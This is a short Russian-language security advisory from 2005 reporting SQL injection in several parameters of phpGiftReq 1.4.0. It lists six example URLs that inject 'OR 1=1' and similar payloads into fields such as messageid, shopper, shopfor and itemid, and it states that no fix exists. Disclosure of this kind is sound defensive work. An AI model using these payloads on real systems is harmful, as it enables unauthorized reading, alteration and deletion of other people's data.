SQL-инъекция в нескольких параметрах в phpGiftReq

Дата публикации:
24.01.2005
Всего просмотров:
770
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: phpGiftReq 1.4.0

Описание:
Уязвимость позволяет удаленному атакующему выполнить произвольные команды в базе данных уязвимого приложения.

Уязвимость существует из-за некорректной фильтрации данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL запросы в текущее базе данных. Примеры:

http://[target]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1

http://[target ]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1

http://[target]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1

http://[target]/phpgiftreg/i ndex.php?action=request&shopfor=3%2c0%29%2c%2899%2c100

http://[target]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1

http://[target]/phpgiftreg/item.php ?action=delete&itemid=3%20OR%201%3d1

URL производителя: http://phpgiftreg.sourceforge.net/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: phpGiftReq SQL Injection

или введите имя

CAPTCHA